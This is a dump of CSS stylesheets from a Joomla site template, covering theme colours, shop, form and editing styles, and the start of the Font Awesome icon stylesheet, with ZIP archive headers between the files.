#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #f14833;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fas,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.far {
  color: #f14833;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fas,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.far {
  color: #f47363;
}
input[type="text"]:focus {
  border: 1px solid #f14833;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #f14833;
}
.search:before {
  color: #f47363;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #f14833;
}
.post-format-masonry > i {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.7);
}
.post-format {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
}
.entry-link,
.entry-quote {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
}
blockquote {
  border-color: #f14833;
}
.sp-comingsoon body {
  background-color: #ef331b;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #f14833;
  background-color: #f14833;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #f14833;
  background-color: #f14833;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #f47363;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #f14833;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #f14833;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #f47363;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #f14833;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #f14833;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #f14833;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #f14833;
}
.entry-header h1:after,
.entry-header h2:after {
  background: #f47363;
}
.html-style span {
  background: #f46a59;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #f46a59;
}
.bullets .li-circle {
  color: #f14833;
}
.dropcaps .naked-drop span {
  color: #f14833;
}
.dropcaps .full-drop span {
  background: #f14833;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #f47363;
}
.cd-pagination li.active >a {
  background-color: #f14833;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #f14833;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #b21f0c;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(241,72,51,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #f14833;
}
.sppb-nav-tabs >li >a {
  color: #f14833;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #f47363;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #f47363;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #f14833;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #f14833;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #f14833;
  border-bottom-color: #f14833;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #f14833;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #f14833;
  box-shadow: inset 0 0 0 1px #f14833;
}
.sppb-nav-pills >li.active >a >i {
  color: #f14833;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #f47363;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o,
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.far.fa-star {
  color: #c0c0c0;
}
.pro-client-url {
  color: #f14833;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #f14833;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #f14833;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #f14833;
}
.light .sppb-selector span i {
  color: #fbc8c2;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.light .sppb-selector >i {
  color: #f9b3aa;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #fbc8c2;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #f47363;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #f35d4b;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #f14833;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #f14833;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #f14833;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.default >.sppb-media-body >i.fas,
.sppb-media.flex >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fas {
  color: #fbc8c2;
}
.sppb-media footer strong {
  color: #f35d4b;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #f47363;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f89e92;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #f35d4b;
  box-shadow: 0 0 5px rgba(241,72,51,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f57b6c;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #f6887b;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #f6887b;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #f9b3aa;
}
.acym_module_form .acysubbuttons-icon::before {
  background: #f14833;
}
.dark .acymailing_form .acysubbuttons {
  color: #f79184;
}
.dark .acymailing_form .acysubbuttons:focus {
  border: 1px solid #f6887b;
}
.dark .acym_module_form input.cell {
  color: #fbc8c2;
}
.dark .acym_module_form input.cell:focus {
  border: 1px solid #f6887b;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #f89e92 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #f47363 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #f89e92 !important;
}
.form-builder-checkbox-item label::before,
.form-builder-radio-item label::before,
.sppb-addon-form-builder .sppb-form-check-label::before {
  border: 2px solid #f6887b;
}
.form-builder-checkbox-item input:checked+label::before,
.form-builder-radio-item input:checked+label::before,
.sppb-addon-form-builder .sppb-form-check-input:checked+label::before {
  background: #f35d4b;
  box-shadow: inset 0 0 5px rgba(0,0,0,0.2);
}
.error-page .error-page-inner >div.container .btn-error {
  background: #f35d4b;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #f14833;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #f6887b;
}
.error-page .error-page-inner >div.container .error-code {
  color: #f47363;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #f35d4b;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #f35d4b;
}
.sp-button {
  border-color: #f6887b !important;
}
.sp-selected-button {
  background-color: #f14833 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #f14833 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #ca230e !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(241,72,51,0.8);
}
.cd-customization .add-to-cart {
  background-color: #f14833;
}
.cd-customization .add-to-cart:hover {
  background-color: #ef2a12;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #ef2a12;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #f14833;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #f57b6c;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #f14833;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(241,72,51,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #f14833;
  border-top: 1px solid rgba(241,72,51,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #f6887b;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(241,72,51,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #f14833;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #f14833;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #ef331b;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #f14833;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #e2270f;
}
.cart-view .billto-shipto a.details {
  background: #f14833;
}
.cart-view .billto-shipto a.details:hover {
  background: #e2270f;
}
.cart-view table.cart-summary tr th {
  background: #f14833;
  border: solid 1px #f14833;
}
.cart-view table.cart-summary input.details-button {
  background: #f14833;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #f14833;
}
.sectiontableentry1 td a.change-payment {
  color: #f47363;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #f14833;
}
.vm-button-correct {
  background-color: #f14833;
}
.vm-button-correct:hover {
  background-color: #ef331b;
}
.vm-button {
  background-color: #f47363;
}
#com-form-login-remember input.default {
  background: #f14833;
}
#com-form-login-remember input.default:hover {
  background: #ef331b;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f14833;
  color: #f14833;
}
.control-buttons button.default {
  background: #f14833;
}
.control-buttons button.default:hover {
  background: #ef331b;
}
span.userfields_info {
  color: #f14833;
  border-bottom: 1px solid #f14833;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #f14833;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #f14833;
}
.vm-flex-search .vm-search-button >i {
  color: #f6887b;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #f14833;
}
.chzn-container-active .chzn-single {
  border: 1px solid #f14833 !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #f14833;
}
.vm-menu .vm-title {
  border-top: 1px solid #f47363;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #f14833;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(241,72,51,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(241,72,51,0.85);
    stroke: #f14833;
  }
}
PK!-����flex/css/frontend-edit.cssnu&1i�.btn.jmodedit {
  background-color: rgba(241,72,51,0.87);
  background-image: none;
  box-shadow: 0 1px 5px rgba(0,0,0,0.3);
  min-height: 32px;
  text-align: center;
  top: 1px;
  right: 1px;
  overflow: hidden;
}
.btn.jmodedit::before {
  font-family: 'peIcon7';
  content: "\e62c";
  color: #fff;
  text-shadow: 1px 1px 1px rgba(0,0,0,0.2);
  font-size: 22px;
  line-height: 25px;
  right: 16px;
  text-align: center;
  vertical-align: middle;
  display: block;
  position: absolute;
  top: 1px;
}
.layout-edit select.inputbox,
.layout-edit select {
  width: 250px;
  max-width: 100%;
}
.layout-edit .btn-toolbar {
  margin-bottom: 20px;
}
.layout-edit .btn-toolbar .btn .fa,
.layout-edit .btn-toolbar .btn .fas {
  margin-right: 3px;
  margin-left: -3px;
}
.layout-edit .btn-toolbar .btn .fa.fa-archive,
.layout-edit .btn-toolbar .btn .fas.fa-archive {
  margin-right: 6px;
}
.layout-edit .tab-content {
  padding-top: 20px;
}
.layout-edit #editor-xtd-buttons,
.layout-edit .toggle-editor {
  margin-top: 20px;
}
.layout-edit .btn-group input[type="radio"] {
  display: none;
}
iframe,
svg {
  max-width: 100%;
}
#sbox-content > iframe {
  height: 100%;
}
.alert.alert-message {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert.alert-message h4 {
  color: #468847;
}
.manager.thumbnails {
  list-style: none;
  padding: 0;
  margin: 0 0 0 -20px;
}
.manager.thumbnails li {
  text-align: center;
  display: block;
  float: left;
  width: 80px;
  height: 80px;
  line-height: 18px;
  border: 1px solid #ddd;
  -webkit-border-radius: 4px;
  -moz-border-radius: 4px;
  border-radius: 4px;
  -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.055);
  box-shadow: 0 1px 3px rgba(0,0,0,0.055);
  position: relative;
}
.manager.thumbnails li [class^="icon-"],
.manager.thumbnails li [class*=" icon-"] {
  font-size: 14px;
  line-height: 14px;
  color: #08c;
  display: inline-block;
  margin-top: 6px;
}
.manager.thumbnails li .height-50 {
  margin-top: 4px;
  height: 50px;
  margin-bottom: 4px;
}
.manager.thumbnails li a {
  text-decoration: none;
  color: #08c;
  font-size: 13px;
}
.manager.thumbnails li:hover {
  background: #f7fcff;
  border-color: rgba(82,168,236,0.8);
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 8px rgba(82,168,236,0.6);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 8px rgba(82,168,236,0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 8px rgba(82,168,236,0.6);
  -webkit-transition: all 400ms;
  transition: all 400ms;
}
#mailto-window {
  margin: 20px;
}
#mailto-window >h2 {
  font-size: 18px;
  margin-top: 0;
}
#mailto-window input[type="text"] {
  height: auto !important;
}
.chzn-container.chzn-container-multi input[type="text"] {
  min-height: 30px;
}
#sppostformats .sp-image-upload-wrapper {
  width: 300px;
  margin: 0 0 20px 0;
}
#sppostformats .sp-image-upload-wrapper img {
  width: 300px;
  margin: 0;
  padding: 0;
  position: relative;
  object-fit: cover;
}
#sppostformats .post-formats {
  padding: 0 !important;
  border-radius: 4px;
  margin: 0 0 10px;
}
#sppostformats .post-formats label {
  border: 1px solid #bbb;
  padding: 7px 12px;
  margin: 0 0 10px -1px;
}
#sppostformats .controls input {
  min-width: 460px;
}
#sppostformats textarea {
  min-width: 460px;
  width: 99%;
  min-height: 120px;
}
#sppostformats .sp-gallery-field ul.sp-gallery-items li {
  height: 100px;
  width: 180px;
}
#sppostformats .sp-gallery-field ul.sp-gallery-items li a.btn-remove-image {
  padding: 5px 12px;
}
#sppostformats .sp-gallery-field ul.sp-gallery-items li img {
  width: 180px;
  margin: 0;
  padding: 0;
  object-fit: cover;
}
#sppostformats .sp-gallery-field .btn-sp-gallery-item-upload {
  border: 1px solid rgba(0,0,0,0.15);
  background-color: #f47363;
  color: #fff;
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
#sppostformats .sp-gallery-field .btn-sp-gallery-item-upload:hover {
  background-color: #f14833;
}
.flex-edit .fa-archive {
  margin-right: 7px;
}
div#images {
  overflow: hidden;
}
.sppb_article_edit {
  margin: 0 auto 25px;
}
.sppb_article_edit > a {
  border: 1px solid #f35d4b;
  background: #6c6c6c;
  padding: 11px 25px;
  border-radius: 4px;
  color: #fff;
  text-shadow: 1px 1px 2px rgba(0,0,0,0.2);
}
.sppb_article_edit > a:hover {
  border: 1px solid #ef331b;
  background: #5a5a5a;
}
.edit-article {
  margin: 0;
  float: right;
  display: inline-block;
  position: relative;
  width: 100px;
  z-index: 2;
}
.btn.dropdown-toggle {
  border: 1px solid #f35d4b;
  background: transparent;
  padding: 5px;
  color: #777;
}
.btn.dropdown-toggle:before {
  font-family: 'peIcon7';
  content: "\e62c";
  font-size: 21px;
  line-height: 24px;
  margin: 0 7px 0 10px;
}
.btn.dropdown-toggle:hover {
  border: 1px solid #ef331b;
  color: #444;
}
.btn.dropdown-toggle .icon-cog {
  display: none;
}
.btn.dropdown-toggle .caret {
  margin: 12px 8px 0 0;
  vertical-align: top;
}
.media-preview.add-on {
  height: 34px;
  margin-left: 1px;
  background: #f9f9f9;
  width: 42px;
}
.media-preview.add-on > .hasTipPreview {
  line-height: 26px;
}
.media-preview.add-on > .hasTipPreview:before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
  content: "\f06e";
  font-style: normal;
}
.controls .input-append a.modal.btn,
a.modal.btn {
  position: relative !important;
  background: #f35d4b;
  line-height: 16px;
  color: #fff;
  z-index: 1;
}
.controls .input-append a.modal.btn:hover,
a.modal.btn:hover {
  background: #ef331b;
}
a.btn.hasTooltip {
  position: absolute;
  line-height: 16px;
  padding-left: 4px;
  padding-right: 4px;
  display: inline-block;
  background: #eee;
  border: 1px solid #ccc;
  text-align: center;
}
.icon-remove {
  background-image: none;
  font-style: normal;
  padding-left: 12px;
  padding-right: 12px;
}
.icon-remove:before {
  font-family: 'Font Awesome 5 Free';
  font-weight: 900;
  content: "\f00d";
  font-style: normal;
}
.calendar table {
  width: 100%;
  background: #e0e0e0;
}
.calendar table .button {
  border-radius: 0;
  background: #999;
  border: 1px solid rgba(0,0,0,0.2);
  display: table-cell;
}
.calendar table .button:hover {
  background: #333;
  color: #fff;
}
.calendar table tbody td {
  text-align: center !important;
}
.input-append button[id^="jform_publish"] {
  background: #f35d4b;
  line-height: 1;
  padding-left: 16px;
  padding-right: 15px;
}
.input-append button[id^="jform_publish"]:hover {
  background: #ef331b;
}
textarea#jform_metadesc {
  min-width: 470px;
  min-height: 150px;
}
.js-calendar {
  min-width: 264px;
  width: auto;
  padding: 8px !important;
  background: rgba(255,255,255,0.9);
  border-radius: 5px !important;
}
.js-calendar .buttons-wrapper .btn-exit,
.js-calendar .buttons-wrapper .btn-today,
.js-calendar .buttons-wrapper .btn-clear {
  margin: 3px;
  padding: 5px 18px;
  border-radius: 4px !important;
  text-align: center;
  border: 1px solid #ddd;
}
PK!�*��flex/css/font-awesome.min.cssnu&1i�/*!
 * Font Awesome Free 5.15.1 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */
.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left,.fab.fa-pull-left,.fal.fa-pull-left,.far.fa-pull-left,.fas.fa-pull-left{margin-right:.3em}.fa.fa-pull-right,.fab.fa-pull-right,.fal.fa-pull-right,.far.fa-pull-right,.fas.fa-pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s linear infinite;animation:fa-spin 2s linear infinite}.fa-pulse{-webkit-animation:fa-spin 1s steps(8) infinite;animation:fa-spin 1s steps(8) infinite}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.fa-rotate-90{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";-webkit-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";-webkit-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";-webkit-transform:scaleX(-1);transform:scaleX(-1)}.fa-flip-vertical{-webkit-transform:scaleY(-1);transform:scaleY(-1)}.fa-flip-both,.fa-flip-horizontal.fa-flip-vertical,.fa-flip-vertical{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2, 